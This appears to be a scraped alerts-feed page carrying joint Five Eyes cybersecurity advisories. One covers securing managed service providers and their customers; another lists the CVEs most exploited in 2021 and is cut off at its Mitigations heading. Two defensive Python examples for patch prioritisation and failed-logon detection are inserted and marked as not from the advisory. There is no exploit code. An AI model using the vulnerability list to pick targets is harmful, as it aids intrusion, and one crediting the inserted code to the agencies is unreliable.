U.S. organizations: To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov. To report computer intrusion or cybercrime activity related to information found in this advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch at 855-292-3937 or by email at CyWatch@fbi.gov. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov.

Canadian organizations: report incidents by emailing CCCS at contact@cyber.gc.ca.

New Zealand organizations: report cyber security incidents to incidents@ncsc.govt.nz or call 04 498 7654.

The Netherlands organizations: report incidents to cert@ncsc.nl.

United Kingdom organizations: report a significant cyber security incident: ncsc.gov.uk/report-an-incident (monitored 24 hours) or, for urgent assistance, call 03000 200 973.

Caveats

The information you have accessed or received is being provided “as is” for informational purposes only. CISA, the FBI, NSA, CCCS, NCSC-NZ, CERT-NZ, NCSC-NL, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring.

Purpose

This document was developed by CISA, the FBI, NSA, CCCS, NCSC-NZ, CERT-NZ, NCSC-NL, and NCSC-UK in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. 

Revisions
  • May 17, 2022: Initial version

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts

AA22-131A: Protecting Against Cyber Threats to Managed Service Providers and their Customers

US-CERT Security Alerts - Wed, 05/11/2022 - 03:00
Original release date: May 11, 2022
Summary

Tactical actions for MSPs and their customers to take today:
• Identify and disable accounts that are no longer in use.
• Enforce MFA on MSP accounts that access the customer environment and monitor for unexplained failed authentication.
• Ensure MSP-customer contracts transparently identify ownership of ICT security roles and responsibilities.

The cybersecurity authorities of the United Kingdom (NCSC-UK), Australia (ACSC), Canada (CCCS), New Zealand (NCSC-NZ), and the United States (CISA), (NSA), (FBI) are aware of recent reports that observe an increase in malicious cyber activity targeting managed service providers (MSPs) and expect this trend to continue.[1] This joint Cybersecurity Advisory (CSA) provides actions MSPs and their customers can take to reduce their risk of falling victim to a cyber intrusion. This advisory describes cybersecurity best practices for information and communications technology (ICT) services and functions, focusing on guidance that enables transparent discussions between MSPs and their customers on securing sensitive data. Organizations should implement these guidelines as appropriate to their unique environments, in accordance with their specific security needs, and in compliance with applicable regulations. MSP customers should verify that the contractual arrangements with their provider include cybersecurity measures in line with their particular security requirements.

The guidance provided in this advisory is specifically tailored for both MSPs and their customers and is the result of a collaborative effort from the United Kingdom National Cyber Security Centre (NCSC-UK), the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NCSC-NZ), the United States' Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI) with contributions from industry members of the Joint Cyber Defense Collaborative (JCDC). Organizations should read this advisory in conjunction with NCSC-UK guidance on actions to take when the cyber threat is heightened, CCCS guidance on Cyber Security Considerations for Consumers of Managed Services, and CISA guidance provided on the Shields Up and Shields Up Technical Guidance webpages.

Managed Service Providers

This advisory defines MSPs as entities that deliver, operate, or manage ICT services and functions for their customers via a contractual arrangement, such as a service level agreement. In addition to offering their own services, an MSP may offer services in conjunction with those of other providers. Offerings may include platform, software, and IT infrastructure services; business process and support functions; and cybersecurity services. MSPs typically manage these services and functions in their customer's network environment—either on the customer's premises or hosted in the MSP's data center. Note: this advisory does not address guidance on cloud service providers (CSPs)—providers who handle the ICT needs of their customers via cloud services such as Software-as-a-Service, Platform-as-a-Service, and Infrastructure-as-a-Service; however, MSPs may offer these services as well. (See Appendix for additional definitions.)

MSPs provide services that usually require both trusted network connectivity and privileged access to and from customer systems. Many organizations—ranging from large critical infrastructure organizations to small- and mid-sized businesses—use MSPs to manage ICT systems, store data, or support sensitive processes. Many organizations make use of MSPs to scale and support network environments and processes without expanding their internal staff or having to develop the capabilities internally. 

Threat Actors Targeting MSP Access to Customer Networks

Whether the customer's network environment is on premises or externally hosted, threat actors can use a vulnerable MSP as an initial access vector to multiple victim networks, with globally cascading effects. The UK, Australian, Canadian, New Zealand, and U.S. cybersecurity authorities expect malicious cyber actors—including state-sponsored advanced persistent threat (APT) groups—to step up their targeting of MSPs in their efforts to exploit provider-customer network trust relationships. For example, threat actors successfully compromising an MSP could enable follow-on activity—such as ransomware and cyber espionage—against the MSP as well as across the MSP's customer base.

The UK, Australian, Canadian, New Zealand, and U.S. cybersecurity authorities have previously issued general guidance for MSPs and their customers.[2],[3],[4],[5],[6],[7],[8] This advisory provides specific guidance to enable transparent, well-informed discussions between MSPs and their customers that center on securing sensitive information and data. These discussions should result in a re-evaluation of security processes and contractual commitments to accommodate customer risk tolerance. A shared commitment to security will reduce risk for both MSPs and their customers, as well as the global ICT community. 

Download the Joint Cybersecurity Advisory: Protecting Against Cyber Threats to Managed Service Providers and their Customers (pdf, 697kb).

Recommendations
MSPs and their Customers

The UK, Australian, Canadian, New Zealand, and U.S. cybersecurity authorities recommend MSPs and their customers implement the baseline security measures and operational controls listed in this section. Additionally, customers should ensure their contractual arrangements specify that their MSP implements these measures and controls.

Prevent initial compromise. 

In their efforts to compromise MSPs, malicious cyber actors exploit vulnerable devices and internet-facing services, conduct brute force attacks, and use phishing techniques. MSPs and their customers should ensure they are mitigating these attack methods. Useful mitigation resources on initial compromise attack methods are listed below:

Enable/improve monitoring and logging processes. 

It can be months before incidents are detected, so UK, Australian, Canadian, New Zealand, and U.S. cybersecurity authorities recommend all organizations store their most important logs for at least six months. Whether through a comprehensive security information and event management (SIEM) solution or discrete logging tools, implement and maintain a segregated logging regime to detect threats to networks. Organizations can refer to the following NCSC-UK guidance on the appropriate data to collect for security purposes and when to use it: What exactly should we be logging? Additionally, all organizations—whether through contractual arrangements with an MSP or on their own—should implement endpoint detection and network defense monitoring capabilities in addition to using application allowlisting/denylisting. 

  • MSPs should log the delivery infrastructure activities used to provide services to the customer. MSPs should also log both internal and customer network activity, as appropriate and contractually agreed upon. 
  • Customers should enable effective monitoring and logging of their systems. If customers choose to engage an MSP to perform monitoring and logging, they should ensure that their contractual arrangements require their MSP to:
    • Implement comprehensive security event management that enables appropriate monitoring and logging of provider-managed customer systems; 
    • Provide visibility—as specified in the contractual arrangement—to customers of logging activities, including provider's presence, activities, and connections to the customer networks (Note: customers should ensure that MSP accounts are properly monitored and audited.); and
    • Notify customer of confirmed or suspected security events and incidents occurring on the provider’s infrastructure and administrative networks, and send these to a security operations center (SOC) for analysis and triage. 
Enforce multifactor authentication (MFA). 

Organizations should secure remote access applications and enforce MFA where possible to harden the infrastructure that enables access to networks and systems.[9],[10] Note: Russian state-sponsored APT actors have recently demonstrated the ability to exploit default MFA protocols; organizations should review configuration policies to protect against “fail open” and re-enrollment scenarios.[11]

  • MSPs should recommend the adoption of MFA across all customer services and products. Note: MSPs should also implement MFA on all accounts that have access to customer environments and should treat those accounts as privileged.
  • Customers should ensure that their contractual arrangements mandate the use of MFA on the services and products they receive. Contracts should also require MFA to be enforced on all MSP accounts used to access customer environments.
Manage internal architecture risks and segregate internal networks. 

Organizations should understand their environment and segregate their networks. Identify, group, and isolate critical business systems and apply appropriate network security controls to them to reduce the impact of a compromise across the organization.[12],[13]

  • MSPs should review and verify all connections between internal systems, customer systems, and other networks. Segregate customer data sets (and services, where applicable) from each other—as well as from internal company networks—to limit the impact of a single vector of attack. Do not reuse admin credentials across multiple customers. 
  • Customers should review and verify all connections between internal systems, MSP systems, and other networks. Ensure management of identity providers and trusts between the different environments. Use a dedicated virtual private network (VPN) or alternative secure access method, to connect to MSP infrastructure and limit all network traffic to and from the MSP to that dedicated secure connection. Verify that the networks used for trust relationships with MSPs are suitably segregated from the rest of their networks. Ensure contractual agreements specify that MSPs will not reuse admin credentials across multiple customers.
Apply the principle of least privilege. 

Organizations should apply the principle of least privilege throughout their network environment and immediately update privileges upon changes in administrative roles. Use a tiering model for administrative accounts so that these accounts do not have any unnecessary access or privileges. Only use accounts with full privileges across an enterprise when strictly necessary and consider the use of time-based privileges to further restrict their use. Identify high-risk devices, services and users to minimize their accesses.[14]

  • MSPs should apply this principle to both internal and customer environments, avoiding default administrative privileges. 
  • Customers should ensure that their MSP applies this principle to both provider and customer network environments. Note: customers with contractual arrangements that provide them with administration of MSP accounts within their environment should ensure that the MSP accounts only have access to the services/resources being managed by the MSP.
Deprecate obsolete accounts and infrastructure. 

Both MSPs and customers should periodically review their internet attack surface and take steps to limit it, such as disabling user accounts when personnel transition.[15] (Note: although sharing accounts is not recommended, should an organization require this, passwords to shared accounts should be reset when personnel transition.) Organizations should also audit their network infrastructure—paying particular attention to those on the MSP-customer boundary—to identify and disable unused systems and services. Port scanning tools and automated system inventories can assist organizations in confirming the roles and responsibilities of systems.

  • Customers should be sure to disable MSP accounts that are no longer managing infrastructure. Note: disabling MSP accounts can be overlooked when a contract terminates.
Apply updates. 

Organizations should update software, including operating systems, applications, and firmware. Prioritize applying security updates to software containing known exploited vulnerabilities. Note: organizations should prioritize patching vulnerabilities included in CISA’s catalogue of known exploited vulnerabilities (KEV) as opposed to only those with high Common Vulnerability Scoring System (CVSS) scores that have not been exploited and may never be exploited.[16],[17],[18],[19]

  • MSPs should implement updates on internal networks as quickly as possible.
  • Customers should ensure that they understand their MSP's policy on software updates and request that comprehensive and timely updates are delivered as an ongoing service.
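The note above on patching KEV-listed vulnerabilities ahead of merely high-CVSS ones can be turned into a patch-queue ordering. The following is an added example, not code from the advisory: the catalog excerpt is constructed in the shape of the KEV catalog's JSON (`cveID`, `dueDate`), and the due dates, CVSS scores, asset names and `CVE-0000-…` placeholder IDs are sample values.

```python
"""Order scanner findings so KEV-listed CVEs are patched before unexploited ones."""
import json
from datetime import date

# Constructed excerpt shaped like the KEV catalog JSON. The CVE IDs are ones this
# page names as routinely exploited; the due dates are sample values.
KEV_SAMPLE = """
{"vulnerabilities": [
  {"cveID": "CVE-2021-44228", "dueDate": "2021-12-24"},
  {"cveID": "CVE-2021-27065", "dueDate": "2021-04-16"},
  {"cveID": "CVE-2018-13379", "dueDate": "2022-05-03"}
]}
"""

# Constructed scanner output. CVSS values are sample scores; CVE-0000-* are
# placeholders for findings that are not in the catalog.
FINDINGS = [
    {"asset": "intranet-wiki", "cve": "CVE-0000-0001", "cvss": 9.9, "internet_facing": False},
    {"asset": "mail-01", "cve": "CVE-2021-27065", "cvss": 7.8, "internet_facing": True},
    {"asset": "vpn-gw-1", "cve": "CVE-2018-13379", "cvss": 9.8, "internet_facing": True},
    {"asset": "build-agent", "cve": "CVE-2021-44228", "cvss": 10.0, "internet_facing": False},
    {"asset": "web-01", "cve": "CVE-0000-0002", "cvss": 7.5, "internet_facing": True},
]


def load_kev_due_dates(kev_json):
    """Map CVE ID -> remediation due date from a KEV-style JSON document."""
    catalog = json.loads(kev_json)
    return {
        entry["cveID"].upper(): date.fromisoformat(entry["dueDate"])
        for entry in catalog["vulnerabilities"]
    }


def prioritize(findings, kev_due, today):
    """Return findings ordered: KEV-listed first (earliest due date first),
    then everything else with internet-facing assets ahead of internal ones
    and CVSS used only as the final tie-breaker."""
    ranked = []
    for finding in findings:
        due = kev_due.get(finding["cve"].upper())
        ranked.append({
            **finding,
            "kev": due is not None,
            "kev_due": due,
            # How far past the catalog due date the finding is (0 if not yet due).
            "days_overdue": max((today - due).days, 0) if due else None,
        })
    ranked.sort(key=lambda r: (
        not r["kev"],
        r["kev_due"] or date.max,
        not r["internet_facing"],
        -r["cvss"],
    ))
    return ranked


if __name__ == "__main__":
    queue = prioritize(FINDINGS, load_kev_due_dates(KEV_SAMPLE), date(2022, 5, 11))
    for item in queue:
        print(item["asset"], item["cve"], item["cvss"], item["kev"], item["days_overdue"])
```

In this sample the 7.8-scored finding on `mail-01` heads the queue and the 9.9-scored, non-catalog finding on `intranet-wiki` comes last.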
Backup systems and data. 

Organizations should regularly update and test backups—including “gold images” of critical systems in the event these need to be rebuilt (Note: organizations should base the frequency of backups on their recovery point objective [20]). Store backups separately and isolate them from network connections that could enable the spread of ransomware; many ransomware variants attempt to find and encrypt/delete accessible backups. Isolating backups enables restoration of systems/data to their previous state should they be encrypted with ransomware. Note: best practices include storing backups separately, such as on external media.[21],[22],[23]

  • MSPs should regularly backup internal data as well as customer data (where contractually appropriate) and maintain offline backups encrypted with separate, offline encryption keys. Providers should encourage customers to create secure, offsite backups and exercise recovery capabilities.
  • Customers should ensure that their contractual arrangements include backup services that meet their resilience and disaster recovery requirements. Specifically, customers should require their MSP to implement a backup solution that automatically and continuously backs up critical data and system configurations and store backups in an easily retrievable location, e.g., a cloud-based solution or a location that is air-gapped from the organizational network.
Develop and exercise incident response and recovery plans. 

Incident response and recovery plans should include roles and responsibilities for all organizational stakeholders, including executives, technical leads, and procurement officers. Organizations should maintain up-to-date hard copies of plans to ensure responders can access them should the network be inaccessible (e.g., due to a ransomware attack).[24]

  • MSPs should develop and regularly exercise internal incident response and recovery plans and encourage customers to do the same.
  • Customers should ensure that their contractual arrangements include incident response and recovery plans that meet their resilience and disaster recovery requirements. Customers should ensure these plans are tested at regular intervals.
Understand and proactively manage supply chain risk. 

All organizations should proactively manage ICT supply chain risk across security, legal, and procurement groups, using risk assessments to identify and prioritize the allocation of resources.[25],[26]

  • MSPs should understand their own supply chain risk and manage the cascading risks it poses to customers.
  • Customers should understand the supply chain risk associated with their MSP, including risk associated with third-party vendors or subcontractors. Customers should also set clear network security expectations with their MSPs and understand the access their MSP has to their network and the data it houses. Each customer should ensure their contractual arrangements meet their specific security requirements and that their contract specifies whether the MSP or the customer owns specific responsibilities, such as hardening, detection, and incident response.[27]
Promote transparency. 

Both MSPs and their customers will benefit from contractual arrangements that clearly define responsibilities. 

  • MSPs, when negotiating the terms of a contract with their customer, should provide clear explanations of the services the customer is purchasing, services the customer is not purchasing, and all contingencies for incident response and recovery.
  • Customers should ensure that they have a thorough understanding of the security services their MSP is providing via the contractual arrangement and address any security requirements that fall outside the scope of the contract. Note: contracts should detail how and when MSPs notify the customer of an incident affecting the customer's environment.
Manage account authentication and authorization. 

All organizations should adhere to best practices for password and permission management. [28],[29],[30] Organizations should review logs for unexplained failed authentication attempts—failed authentication attempts directly following an account password change could indicate that the account had been compromised. Note: network defenders can proactively search for such "intrusion canaries" by reviewing logs after performing password changes—using off-network communications to inform users of the changes—across all sensitive accounts. (See the ACSC publication, Windows Event Logging and Forwarding as well as Microsoft's documentation, 4625(F): An account failed to log on, for additional guidance.) 

  • MSPs should verify that the customer restricts MSP account access to systems managed by the MSP.
  • Customers should ensure MSP accounts are not assigned to internal administrator groups; instead, restrict MSP accounts to systems managed by the MSP. Grant access and administrative permissions on a need-to-know basis, using the principle of least privilege. Verify, via audits, that MSP accounts are being used for appropriate purposes and activities, and that these accounts are disabled when not actively being used. 
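The "intrusion canary" review described above can be automated over exported logon events. This is an added example, not part of the advisory: event ID 4625 is the one the advisory cites, while 4723/4724 (password change/reset) and 4624 (successful logon) are further Windows Security event IDs used here, and the CSV layout, account names, addresses and 24-hour window are assumptions.

```python
"""Flag failed logons that follow a password change ("intrusion canaries")."""
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

# Windows Security event IDs:
#   4723 = attempt to change an account's password
#   4724 = attempt to reset an account's password
#   4624 = an account was successfully logged on
#   4625 = an account failed to log on
PASSWORD_CHANGE_IDS = {4723, 4724}
LOGON_OK, LOGON_FAILED = 4624, 4625

# Constructed sample export: time, event ID, target account, source address.
SAMPLE_EVENTS = """\
time,event_id,account,source
2022-05-09T08:02:11,4624,svc-backup,10.0.5.20
2022-05-10T09:00:00,4724,svc-backup,10.0.1.5
2022-05-10T09:04:37,4625,svc-backup,10.0.5.20
2022-05-10T11:15:02,4625,svc-backup,203.0.113.44
2022-05-10T11:15:09,4625,svc-backup,203.0.113.44
2022-05-10T09:30:00,4724,msp-admin,10.0.1.5
2022-05-10T09:31:12,4624,msp-admin,10.0.7.8
2022-05-13T10:00:00,4625,msp-admin,10.0.7.8
2022-05-10T12:00:00,4625,jsmith,10.0.9.9
"""


def load_events(text):
    """Parse the CSV export and return the events in chronological order."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        rows.append({
            "time": datetime.fromisoformat(row["time"]),
            "event_id": int(row["event_id"]),
            "account": row["account"].lower(),
            "source": row["source"],
        })
    return sorted(rows, key=lambda r: r["time"])


def find_canaries(events, window=timedelta(hours=24)):
    """Return one finding per (account, source) whose failed logons fall inside
    `window` after that account's most recent password change."""
    last_change = {}                       # account -> time of latest change
    pre_change_sources = defaultdict(set)  # account -> sources that logged on before it
    findings = {}
    for ev in events:
        acct, eid, src = ev["account"], ev["event_id"], ev["source"]
        if eid in PASSWORD_CHANGE_IDS:
            last_change[acct] = ev["time"]
        elif eid == LOGON_OK and acct not in last_change:
            pre_change_sources[acct].add(src)
        elif eid == LOGON_FAILED and acct in last_change:
            delay = ev["time"] - last_change[acct]
            if delay > window:
                continue  # too long after the change to tie to it
            hit = findings.setdefault((acct, src), {
                "account": acct,
                "source": src,
                "failures": 0,
                "first_delay_s": int(delay.total_seconds()),
                # True: the source used this account successfully before the
                # change, so a stale stored credential is one explanation.
                "known_source": src in pre_change_sources[acct],
            })
            hit["failures"] += 1
    # Sources never seen with a successful logon come first, then by volume.
    return sorted(findings.values(),
                  key=lambda h: (h["known_source"], -h["failures"]))


if __name__ == "__main__":
    for hit in find_canaries(load_events(SAMPLE_EVENTS)):
        print(hit)
```

Failures for accounts with no recorded password change, or outside the window, are left to ordinary failed-logon monitoring.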
Purpose

This advisory was developed by UK, Australian, Canadian, New Zealand, and U.S. cybersecurity authorities in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.

Acknowledgements

The UK, Australian, Canadian, New Zealand, and U.S. cybersecurity authorities would like to thank Secureworks for their contributions to this CSA.

Disclaimer

The information in this report is being provided “as is” for informational purposes only. NCSC-UK, ACSC, CCCS, NCSC-NZ, CISA, NSA, and FBI do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favouring.

Contact Information

United Kingdom organizations: report a significant cyber security incident: ncsc.gov.uk/report-an-incident (monitored 24 hours) or, for urgent assistance, call 03000 200 973.

Australian organizations: visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.

Canadian organizations: report incidents by emailing CCCS at contact@cyber.gc.ca.

New Zealand organizations: report cyber security incidents to incidents@ncsc.govt.nz or call 04 498 7654.

U.S. organizations: all organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or to the FBI via your local FBI field office or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov.

Resources

In addition to the guidance referenced above, see the following resources:

References

[1] State of the Market: The New Threat Landscape, Pushing MSP security to the next level (N-able) 
[2] Global targeting of enterprises via managed service providers (NCSC-UK)
[3] Guidance for MSPs and Small- and Mid-sized Businesses (CISA)
[4] Kaseya Ransomware Attack: Guidance for Affected MSPs and their Customers (CISA) 
[5] APTs Targeting IT Service Provider Customers (CISA)
[6] MSP Investigation Report (ACSC)
[7] How to Manage Your Security When Engaging a Managed Service Provider
[8] Supply Chain Cyber Security: In Safe Hands (NCSC-NZ)
[9] Multi-factor authentication for online services (NCSC-UK)
[10] Zero trust architecture design principles: MFA (NCSC-UK)
[11] Joint CISA-FBI CSA: Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default MFA Protocols and “PrintNightmare” Vulnerability
[12] Security architecture anti-patterns (NCSC-UK)
[13] Preventing Lateral Movement (NCSC-UK)
[14] Preventing Lateral Movement: Apply the principle of least privilege (NCSC-UK)
[15] Device Security Guidance: Obsolete products (NCSC-UK)
[16] Known Exploited Vulnerabilities Catalog (CISA)
[17] The problems with patching (NCSC-UK)
[18] Security principles for cross domain solutions: Patching (NCSC-UK)
[19] Joint CSA: 2021 Top Routinely Exploited Vulnerabilities
[20] Protecting Data from Ransomware and Other Data Loss Events: A Guide for Managed Service Providers to Conduct, Maintain, and Test Backup Files (NIST)
[21] Stop Ransomware website (CISA)
[22] Offline backups in an online world (NCSC-UK)
[23] Mitigating malware and ransomware attacks (NCSC-UK)
[24] Effective steps to cyber exercise creation (NCSC-UK)
[25] Supply chain security guidance (NCSC-UK)
[26] ICT Supply Chain Resource Library (CISA)
[27] Risk Considerations for Managed Service Provider Customers (CISA)
[28] Device Security Guidance: Enterprise authentication policy (NCSC-UK)
[29] Preventing Lateral Movement: Apply the principle of least privilege (NCSC-UK)
[30] Implementing Strong Authentication (CISA)

Appendix

This advisory's definition of MSPs aligns with the following definitions.

The definition of MSP from Gartner's Information Technology Glossary—which is also referenced by NIST in Improving Cybersecurity of Managed Service Providers—is:

A managed service provider (MSP) delivers services, such as network, application, infrastructure and security, via ongoing and regular support and active administration on customers’ premises, in their MSP’s data center (hosting), or in a third-party data center.

MSPs may deliver their own native services in conjunction with other providers’ services (for example, a security MSP providing sys admin on top of a third-party cloud IaaS). Pure-play MSPs focus on one vendor or technology, usually their own core offerings. Many MSPs include services from other types of providers. The term MSP traditionally was applied to infrastructure or device-centric types of services but has expanded to include any continuous, regular management, maintenance and support.

The United Kingdom's Department of Digital, Culture, Media, and Sport (DCMS) recently published the following definition of MSP, which includes examples: 

Managed Service Provider - A supplier that delivers a portfolio of IT services to business customers via ongoing support and active administration, all of which are typically underpinned by a Service Level Agreement. A Managed Service Provider may provide their own Managed Services or offer their own services in conjunction with other IT providers’ services. The Managed Services might include:

  • Cloud computing services (resale of cloud services, or an in-house public and private cloud services, built and provided by the Managed Service Providers)
  • Workplace services
  • Managed Network
  • Consulting
  • Security services
  • Outsourcing
  • Service Integration and Management
  • Software Resale
  • Software Engineering
  • Analytics and Artificial Intelligence (AI)
  • Business Continuity and Disaster Recovery services

The Managed Services might be delivered from customer premises, from customer data centres, from Managed Service Providers’ own data centres or from 3rd party facilities (co-location facilities, public cloud data centres or network Points of Presence (PoPs)).

Revisions
  • May 11, 2022: Initial version

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts

AA22-117A: 2021 Top Routinely Exploited Vulnerabilities

US-CERT Security Alerts - Wed, 04/27/2022 - 06:00
Original release date: April 27, 2022 | Last revised: April 28, 2022
Summary

This joint Cybersecurity Advisory (CSA) was coauthored by cybersecurity authorities of the United States, Australia, Canada, New Zealand, and the United Kingdom: the Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI), Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security (CCCS), New Zealand National Cyber Security Centre (NZ NCSC), and United Kingdom’s National Cyber Security Centre (NCSC-UK). This advisory provides details on the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.

U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities assess, in 2021, malicious cyber actors aggressively targeted newly disclosed critical software vulnerabilities against broad target sets, including public and private sector organizations worldwide. To a lesser extent, malicious cyber actors continued to exploit publicly known, dated software vulnerabilities across a broad spectrum of targets. 

The cybersecurity authorities encourage organizations to apply the recommendations in the Mitigations section of this CSA. These mitigations include applying timely patches to systems and implementing a centralized patch management system to reduce the risk of compromise by malicious cyber actors.

Download the Joint Cybersecurity Advisory: 2021 Top Routinely Exploited Vulnerabilities (pdf, 777kb).

Technical Details

Key Findings

Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities. For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (POC) code within two weeks of the vulnerability’s disclosure, likely facilitating exploitation by a broader range of malicious actors.

To a lesser extent, malicious cyber actors continued to exploit publicly known, dated software vulnerabilities—some of which were also routinely exploited in 2020 or earlier. The exploitation of older vulnerabilities demonstrates the continued risk to organizations that fail to patch software in a timely manner or are using software that is no longer supported by a vendor.

Top 15 Routinely Exploited Vulnerabilities

Table 1 shows the top 15 vulnerabilities U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities observed malicious actors routinely exploiting in 2021, which include:

  • CVE-2021-44228. This vulnerability, known as Log4Shell, affects Apache’s Log4j library, an open-source logging framework. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system that causes that system to execute arbitrary code. The request allows a cyber actor to take full control over the system. The actor can then steal information, launch ransomware, or conduct other malicious activity.[1] Log4j is incorporated into thousands of products worldwide. This vulnerability was disclosed in December 2021; the rapid widespread exploitation of this vulnerability demonstrates the ability of malicious actors to quickly weaponize known vulnerabilities and target organizations before they patch.
  • CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065. These vulnerabilities, known as ProxyLogon, affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination (i.e., “vulnerability chaining”) allows an unauthenticated cyber actor to execute arbitrary code on vulnerable Exchange Servers, which, in turn, enables the actor to gain persistent access to files and mailboxes on the servers, as well as to credentials stored on the servers. Successful exploitation may additionally enable the cyber actor to compromise trust and identity in a vulnerable network.
  • CVE-2021-34523, CVE-2021-34473, CVE-2021-31207. These vulnerabilities, known as ProxyShell, also affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft’s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers. 
  • CVE-2021-26084. This vulnerability, affecting Atlassian Confluence Server and Data Center, could enable an unauthenticated actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a POC was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021.

Three of the top 15 routinely exploited vulnerabilities were also routinely exploited in 2020: CVE-2020-1472, CVE-2018-13379, and CVE-2019-11510. Their continued exploitation indicates that many organizations fail to patch software in a timely manner and remain vulnerable to malicious cyber actors.

Table 1: Top 15 Routinely Exploited Vulnerabilities in 2021

| CVE | Vulnerability Name | Vendor and Product | Type |
|---|---|---|---|
| CVE-2021-44228 | Log4Shell | Apache Log4j | Remote code execution (RCE) |
| CVE-2021-40539 | | Zoho ManageEngine AD SelfService Plus | RCE |
| CVE-2021-34523 | ProxyShell | Microsoft Exchange Server | Elevation of privilege |
| CVE-2021-34473 | ProxyShell | Microsoft Exchange Server | RCE |
| CVE-2021-31207 | ProxyShell | Microsoft Exchange Server | Security feature bypass |
| CVE-2021-27065 | ProxyLogon | Microsoft Exchange Server | RCE |
| CVE-2021-26858 | ProxyLogon | Microsoft Exchange Server | RCE |
| CVE-2021-26857 | ProxyLogon | Microsoft Exchange Server | RCE |
| CVE-2021-26855 | ProxyLogon | Microsoft Exchange Server | RCE |
| CVE-2021-26084 | | Atlassian Confluence Server and Data Center | Arbitrary code execution |
| CVE-2021-21972 | | VMware vSphere Client | RCE |
| CVE-2020-1472 | ZeroLogon | Microsoft Netlogon Remote Protocol (MS-NRPC) | Elevation of privilege |
| CVE-2020-0688 | | Microsoft Exchange Server | RCE |
| CVE-2019-11510 | | Pulse Secure Pulse Connect Secure | Arbitrary file reading |
| CVE-2018-13379 | | Fortinet FortiOS and FortiProxy | Path traversal |

Additional Routinely Exploited Vulnerabilities

In addition to the 15 vulnerabilities listed in table 1, U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities identified vulnerabilities, listed in table 2, that were also routinely exploited by malicious cyber actors in 2021. 

These vulnerabilities include multiple vulnerabilities affecting internet-facing systems, including Accellion File Transfer Appliance (FTA), Windows Print Spooler, and Pulse Secure Pulse Connect Secure. Three of these vulnerabilities were also routinely exploited in 2020: CVE-2019-19781, CVE-2019-18935, and CVE-2017-11882.

Table 2: Additional Routinely Exploited Vulnerabilities in 2021

| CVE | Vendor and Product | Type |
|---|---|---|
| CVE-2021-42237 | Sitecore XP | RCE |
| CVE-2021-35464 | ForgeRock OpenAM server | RCE |
| CVE-2021-27104 | Accellion FTA | OS command execution |
| CVE-2021-27103 | Accellion FTA | Server-side request forgery |
| CVE-2021-27102 | Accellion FTA | OS command execution |
| CVE-2021-27101 | Accellion FTA | SQL injection |
| CVE-2021-21985 | VMware vCenter Server | RCE |
| CVE-2021-20038 | SonicWall Secure Mobile Access (SMA) | RCE |
| CVE-2021-40444 | Microsoft MSHTML | RCE |
| CVE-2021-34527 | Microsoft Windows Print Spooler | RCE |
| CVE-2021-3156 | Sudo | Privilege escalation |
| CVE-2021-27852 | Checkbox Survey | Remote arbitrary code execution |
| CVE-2021-22893 | Pulse Secure Pulse Connect Secure | Remote arbitrary code execution |
| CVE-2021-20016 | SonicWall SSLVPN SMA100 | Improper SQL command neutralization, allowing for credential access |
| CVE-2021-1675 | Windows Print Spooler | RCE |
| CVE-2020-2509 | QNAP QTS and QuTS hero | Remote arbitrary code execution |
| CVE-2019-19781 | Citrix Application Delivery Controller (ADC) and Gateway | Arbitrary code execution |
| CVE-2019-18935 | Progress Telerik UI for ASP.NET AJAX | Code execution |
| CVE-2018-0171 | Cisco IOS Software and IOS XE Software | Remote arbitrary code execution |
| CVE-2017-11882 | Microsoft Office | RCE |
| CVE-2017-0199 | Microsoft Office | RCE |

Mitigations

Vulnerability and Configuration Management
